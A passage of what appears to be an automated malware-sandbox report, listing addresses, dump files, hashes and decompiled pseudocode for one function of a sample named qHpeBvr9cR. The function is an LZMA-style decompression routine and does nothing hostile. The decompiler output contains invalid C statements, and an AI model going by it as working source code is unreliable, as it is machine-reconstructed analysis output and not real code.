                                              0x00406950
                                              0x00406953
                                              0x00406956
                                              0x00406959
                                              0x0040695d
                                              0x0040695f
                                              0x00406962
                                              0x00000000
                                              0x00406964
                                              0x00000000
                                              0x00406964
                                              0x00406962
                                              0x00406b97
                                              0x00000000
                                              0x00000000
                                              0x004061c6

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                                              • Instruction ID: 56628f401a4fc6d73e137493fcd66a1037cbd66c5efac646bb7951d26cabb475
                                              • Opcode Fuzzy Hash: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                                              • Instruction Fuzzy Hash: CF815871D00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406184 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E00406184(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406BD6))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                              0x00406194
                                              0x0040619b
                                              0x004061a1
                                              0x004061a7
                                              0x00000000
                                              0x004061ab
                                              0x004061b7
                                              0x004061b7
                                              0x004061b7
                                              0x004061c0
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00000000
                                              0x004061cd
                                              0x004061d1
                                              0x00000000
                                              0x00000000
                                              0x004061da
                                              0x004061dd
                                              0x004061e0
                                              0x004061e2
                                              0x004061e4
                                              0x00000000
                                              0x00000000
                                              0x004061ea
                                              0x004061ed
                                              0x004061ef
                                              0x004061f0
                                              0x004061f3
                                              0x004061f5
                                              0x004061f6
                                              0x004061f8
                                              0x004061fb
                                              0x00406200
                                              0x00406205
                                              0x0040620e
                                              0x00406221
                                              0x00406224
                                              0x0040622d
                                              0x00406230
                                              0x00406258
                                              0x00406258
                                              0x0040625a
                                              0x00406268
                                              0x00406268
                                              0x0040626c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040625c
                                              0x0040625c
                                              0x0040625f
                                              0x0040625f
                                              0x00406260
                                              0x00406260
                                              0x00000000
                                              0x0040625c
                                              0x00406232
                                              0x00406236
                                              0x0040623b
                                              0x0040623b
                                              0x00406244
                                              0x0040624a
                                              0x0040624c
                                              0x0040624f
                                              0x00000000
                                              0x00406255
                                              0x00406255
                                              0x00000000
                                              0x00406255
                                              0x00000000
                                              0x00406272
                                              0x00406272
                                              0x00406276
                                              0x00406b22
                                              0x00000000
                                              0x00406b22
                                              0x0040627f
                                              0x0040628f
                                              0x00406292
                                              0x00406295
                                              0x00406295
                                              0x00406295
                                              0x00406298
                                              0x00406298
                                              0x0040629c
                                              0x00000000
                                              0x00000000
                                              0x0040629e
                                              0x004062a1
                                              0x004062a4
                                              0x004062ce
                                              0x004062d4
                                              0x004062db
                                              0x00000000
                                              0x004062db
                                              0x004062a6
                                              0x004062aa
                                              0x004062ad
                                              0x004062b2
                                              0x004062b2
                                              0x004062bd
                                              0x004062c3
                                              0x004062c5
                                              0x004062c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040630d
                                              0x00406313
                                              0x00406316
                                              0x00406323
                                              0x0040632b
                                              0x00000000
                                              0x00000000
                                              0x004062e2
                                              0x004062e2
                                              0x004062e6
                                              0x00406b31
                                              0x00000000
                                              0x00406b31
                                              0x004062f2
                                              0x004062fd
                                              0x004062fd
                                              0x004062fd
                                              0x00406300
                                              0x00406303
                                              0x00406306
                                              0x00406309
                                              0x0040630b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004069a2
                                              0x004069a2
                                              0x004069a8
                                              0x004069ae
                                              0x004069b1
                                              0x004069b4
                                              0x004069ce
                                              0x004069d1
                                              0x004069d7
                                              0x004069e2
                                              0x004069e2
                                              0x004069e4
                                              0x004069b6
                                              0x004069b6
                                              0x004069c5
                                              0x004069c9
                                              0x004069c9
                                              0x004069e7
                                              0x004069ee
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004069f0
                                              0x004069f0
                                              0x004069f4
                                              0x00406ba3
                                              0x00000000
                                              0x00406ba3
                                              0x00406a00
                                              0x00406a07
                                              0x00406a0f
                                              0x00406a0f
                                              0x00406a0f
                                              0x00406a12
                                              0x00406a15
                                              0x00406a15
                                              0x00000000
                                              0x00000000
                                              0x00406333
                                              0x00406335
                                              0x00406338
                                              0x004063a9
                                              0x004063ac
                                              0x004063af
                                              0x004063b6
                                              0x004063c0
                                              0x00000000
                                              0x004063c0
                                              0x0040633a
                                              0x0040633e
